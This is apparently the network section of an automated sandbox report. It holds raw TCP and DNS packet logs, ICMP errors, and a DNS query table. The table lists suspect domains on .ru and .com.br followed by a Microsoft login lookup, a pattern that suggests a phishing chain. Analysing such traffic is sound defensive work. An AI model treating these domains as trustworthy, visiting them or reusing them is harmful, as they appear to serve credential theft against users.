                                                                                                    Jan 14, 2025 18:38:03.379336119 CET44363874104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:03.465555906 CET44363874104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:03.465795994 CET44363874104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:03.465856075 CET63874443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:03.465867043 CET44363874104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:03.465967894 CET44363874104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:03.466022015 CET63874443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:03.466836929 CET63874443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:03.466841936 CET44363874104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:03.674216032 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:03.674319029 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:03.674401999 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:03.674808025 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:03.674853086 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.132838964 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.133209944 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.133276939 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.133640051 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.134037971 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.134119034 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.134201050 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.134337902 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.134387970 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.134510040 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.134553909 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.390201092 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.390244007 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.390278101 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.390324116 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.390362978 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.390418053 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.390486002 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.390528917 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.390528917 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.390538931 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.390600920 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.390894890 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.394848108 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.394880056 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.394936085 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.394946098 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.394998074 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.478944063 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.478993893 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.479022026 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.479055882 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.479082108 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.479149103 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.479168892 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.479227066 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.479228020 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.479228020 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.479268074 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.479413033 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.479470015 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.480640888 CET63875443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.480659008 CET44363875104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.565602064 CET63876443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.565643072 CET44363876104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:04.565721035 CET63876443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.566127062 CET63876443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:04.566142082 CET44363876104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:05.031572104 CET44363876104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:05.031909943 CET63876443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:05.031934977 CET44363876104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:05.032399893 CET44363876104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:05.032866955 CET63876443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:05.032955885 CET44363876104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:05.033055067 CET63876443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:05.075344086 CET44363876104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:05.175612926 CET44363876104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:05.175851107 CET44363876104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:05.175914049 CET63876443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:05.177869081 CET63876443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:05.177897930 CET44363876104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:13.406871080 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:13.406938076 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:13.407013893 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:13.407340050 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:13.407356024 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:13.858493090 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:13.879127979 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:13.879160881 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:13.879703045 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:13.892640114 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:13.892782927 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:13.892930031 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:13.893064022 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:13.893079042 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:13.893158913 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:13.893173933 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.165925026 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.166002989 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.166028023 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.166047096 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.166055918 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.166066885 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.166105986 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.166121006 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.166135073 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.166155100 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.166186094 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.167110920 CET63877443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.167125940 CET44363877104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.175501108 CET63878443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.175538063 CET44363878104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.175589085 CET63878443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.175811052 CET63878443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.175820112 CET44363878104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.377995968 CET63879443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:14.378043890 CET44363879104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.378106117 CET63879443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:14.378321886 CET63879443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:14.378334045 CET44363879104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.633110046 CET44363878104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.633542061 CET63878443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.633573055 CET44363878104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.633913040 CET44363878104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.634272099 CET63878443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.634330988 CET44363878104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.634458065 CET63878443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.679338932 CET44363878104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.773442984 CET44363878104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.773545980 CET44363878104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.773736954 CET63878443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.774506092 CET63878443192.168.2.5104.18.94.41
                                                                                                    Jan 14, 2025 18:38:14.774528980 CET44363878104.18.94.41192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.855850935 CET44363879104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.856251955 CET63879443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:14.856277943 CET44363879104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.857908964 CET44363879104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.858012915 CET63879443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:14.859627008 CET63879443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:14.859714985 CET44363879104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.859822989 CET63879443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:14.859833002 CET44363879104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.906694889 CET63879443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:15.448868990 CET44363879104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:15.449008942 CET44363879104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:15.449163914 CET63879443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:15.450342894 CET63879443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:15.450366020 CET44363879104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:15.649032116 CET63882443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:15.649142027 CET44363882104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:15.649267912 CET63882443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:15.649703979 CET63882443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:15.649722099 CET44363882104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.124579906 CET44363882104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.126805067 CET63882443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.126869917 CET44363882104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.127897978 CET44363882104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.127984047 CET63882443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.128926992 CET63882443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.128962040 CET63882443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.129033089 CET63882443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.129046917 CET44363882104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.129102945 CET63882443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.129416943 CET63883443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.129456997 CET44363883104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.129513979 CET63883443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.129718065 CET63883443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.129734993 CET44363883104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.604825020 CET44363883104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.605103970 CET63883443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.605128050 CET44363883104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.606004953 CET44363883104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.606065035 CET63883443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.606336117 CET63883443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.606393099 CET44363883104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.606487036 CET63883443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:16.606497049 CET44363883104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.646198034 CET63883443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:17.232232094 CET44363883104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:17.232459068 CET44363883104.21.60.111192.168.2.5
                                                                                                    Jan 14, 2025 18:38:17.232510090 CET63883443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:17.233283997 CET63883443192.168.2.5104.21.60.111
                                                                                                    Jan 14, 2025 18:38:17.233302116 CET44363883104.21.60.111192.168.2.5
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Jan 14, 2025 18:35:34.022022963 CET5899753192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:36.188874006 CET53591021.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:47.278095961 CET53533641.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:47.346784115 CET6487253192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:47.347151995 CET5405153192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:47.353858948 CET53648721.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:47.353986979 CET53540511.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:47.473639965 CET53538161.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:48.068016052 CET6434553192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:48.068255901 CET5895653192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:48.279572964 CET53589561.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:48.442958117 CET53643451.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:48.476708889 CET53496581.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:49.324860096 CET5685453192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:49.325414896 CET6424153192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:49.339301109 CET53568541.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:49.456058979 CET53642411.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:50.018148899 CET6158353192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:50.018354893 CET4956253192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:50.372400045 CET5741153192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:50.372673988 CET6227353192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:50.373084068 CET5109653192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:50.373292923 CET6313353192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:50.373552084 CET6441253192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:50.373682022 CET5571553192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:50.378973961 CET53574111.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:50.380289078 CET53622731.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:50.380302906 CET53631331.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:50.380317926 CET53644121.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:50.381280899 CET53557151.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:50.381297112 CET53510961.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:50.422050953 CET53615831.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:50.446899891 CET53495621.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:51.076786041 CET5088253192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:51.076926947 CET6257953192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:51.083807945 CET53625791.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:51.083823919 CET53508821.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:51.181874037 CET6365353192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:51.182146072 CET5886753192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:51.189305067 CET53588671.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:51.189480066 CET53636531.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:51.636028051 CET5915753192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:51.636198044 CET6263153192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:51.642684937 CET53591571.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:51.643258095 CET53626311.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:51.972193956 CET4998953192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:51.972368002 CET6093553192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:51.980410099 CET53499891.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:51.981964111 CET53609351.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:52.118093967 CET5878153192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:52.118277073 CET5320653192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:52.126187086 CET53587811.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:52.126477957 CET53532061.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:52.271090031 CET53590691.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:54.102998972 CET5988853192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:54.103219032 CET5340153192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:35:54.110378981 CET53534011.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:35:54.110502005 CET53598881.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:36:05.478338003 CET53554571.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:36:09.522000074 CET53584171.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:36:46.962517977 CET53573871.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.177761078 CET5926853192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:14.177900076 CET5988953192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:14.335078001 CET53592681.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:38:14.391911030 CET53598891.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:38:15.476290941 CET5989053192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:15.476790905 CET5823353192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:15.492386103 CET6514753192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:15.492460966 CET5767453192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:15.632813931 CET53651471.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:38:15.647983074 CET53576741.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:38:16.554717064 CET6505153192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:16.554805994 CET5454953192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:16.599385977 CET53545491.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:38:18.540491104 CET6549753192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:18.540636063 CET5402453192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:18.547826052 CET53540241.1.1.1192.168.2.5
                                                                                                    Jan 14, 2025 18:38:19.492532015 CET5816553192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:19.492686987 CET5023653192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:19.625113010 CET5359953192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:19.631254911 CET5440953192.168.2.51.1.1.1
                                                                                                    Jan 14, 2025 18:38:27.884712934 CET53508971.1.1.1192.168.2.5
                                                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                                                    Jan 14, 2025 18:35:49.456130028 CET192.168.2.51.1.1.1c27b(Port unreachable)Destination Unreachable
                                                                                                    Jan 14, 2025 18:38:14.391973019 CET192.168.2.51.1.1.1c2ac(Port unreachable)Destination Unreachable
                                                                                                    Jan 14, 2025 18:38:16.599486113 CET192.168.2.51.1.1.1c26c(Port unreachable)Destination Unreachable
                                                                                                    Jan 14, 2025 18:38:17.680820942 CET192.168.2.51.1.1.1c2dd(Port unreachable)Destination Unreachable
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Jan 14, 2025 18:35:34.022022963 CET192.168.2.51.1.1.10xf656Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:47.346784115 CET192.168.2.51.1.1.10xde6aStandard query (0)api.mixpanel.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:47.347151995 CET192.168.2.51.1.1.10xe600Standard query (0)api.mixpanel.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:48.068016052 CET192.168.2.51.1.1.10xc8c4Standard query (0)midiacentral.com.brA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:48.068255901 CET192.168.2.51.1.1.10x43e6Standard query (0)midiacentral.com.br65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:49.324860096 CET192.168.2.51.1.1.10xd7d6Standard query (0)l4u8.yaalwgyl.ruA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:49.325414896 CET192.168.2.51.1.1.10xa5d8Standard query (0)l4u8.yaalwgyl.ru65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.018148899 CET192.168.2.51.1.1.10x9f8aStandard query (0)midiacentral.com.brA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.018354893 CET192.168.2.51.1.1.10x84e8Standard query (0)midiacentral.com.br65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.372400045 CET192.168.2.51.1.1.10x3970Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.372673988 CET192.168.2.51.1.1.10x97a8Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.373084068 CET192.168.2.51.1.1.10xc0e1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.373292923 CET192.168.2.51.1.1.10xdec9Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.373552084 CET192.168.2.51.1.1.10xe492Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:50.373682022 CET192.168.2.51.1.1.10x1d1Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.076786041 CET192.168.2.51.1.1.10xaa8cStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.076926947 CET192.168.2.51.1.1.10x90c5Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.181874037 CET192.168.2.51.1.1.10xbe34Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.182146072 CET192.168.2.51.1.1.10x39a9Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.636028051 CET192.168.2.51.1.1.10x3848Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.636198044 CET192.168.2.51.1.1.10xe590Standard query (0)www.google.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.972193956 CET192.168.2.51.1.1.10x9f93Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:51.972368002 CET192.168.2.51.1.1.10xb7beStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:52.118093967 CET192.168.2.51.1.1.10x9839Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:52.118277073 CET192.168.2.51.1.1.10x5aa8Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:54.102998972 CET192.168.2.51.1.1.10x8a65Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:35:54.103219032 CET192.168.2.51.1.1.10x9bf6Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:14.177761078 CET192.168.2.51.1.1.10xe0eStandard query (0)wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ruA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:14.177900076 CET192.168.2.51.1.1.10x6e91Standard query (0)wctsp4dphdgnjff8epgl6frjohvlohcs9ulik1trbetu546zuxo.sprocubseq.ru65IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:15.476290941 CET192.168.2.51.1.1.10x13efStandard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                                                    Jan 14, 2025 18:38:15.476790905 CET192.168.2.51.1.1.10x3e63Standard query (0)login.microsoftonline.com65IN (0x0001)false
